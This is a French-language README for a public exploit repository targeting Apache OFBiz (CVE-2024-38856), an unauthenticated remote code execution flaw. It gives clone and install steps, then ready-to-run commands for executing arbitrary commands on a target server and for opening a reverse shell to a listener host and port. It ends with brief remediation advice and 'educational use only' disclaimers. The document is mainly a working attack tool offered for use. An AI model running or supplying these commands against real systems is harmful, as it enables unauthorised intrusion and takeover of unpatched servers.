
Exploit pour Apache OFBiz - CVE-2024-38856
Exploit pour Apache OFBiz (CVE-2024-38856) Par : Alisson Faoli
Ce dépôt contient un exploit pour la vulnérabilité CVE-2024-38856 trouvée dans Apache OFBiz. La faille permet une exécution de code à distance (RCE) sans authentification.
Remarque : cet exploit est fourni uniquement à des fins éducatives et de recherche. Une utilisation abusive peut être illégale et relève de la seule responsabilité de l'utilisateur.
CVE : CVE-2024-38856
Logiciel affecté : Apache OFBiz jusqu'à la version 18.12.14
Type de vulnérabilité : RCE
Exploitation : Authentification non requise
Clonez le dépôt :
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Installez les dépendances :
pip install -r requirements.txt
Exécutez l'exploit :
RCE :
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL :
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Pour remédier à cette vulnérabilité, il est recommandé aux administrateurs d'Apache OFBiz de : Mettre à jour vers la version corrigée disponible à l'adresse https://ofbiz.apache.org/download.html. Appliquer des règles de pare-feu ou de WAF pour bloquer les tentatives d'exploitation connues.
Si vous avez des questions ou souhaitez signaler une amélioration de l'exploit, contactez-moi : LinkedIn : https://linkedin.com/in/alisson-faoli/
Ce code est fourni uniquement à des fins éducatives et pour des tests de sécurité dans des environnements autorisés. L'auteur n'est pas responsable de toute utilisation abusive.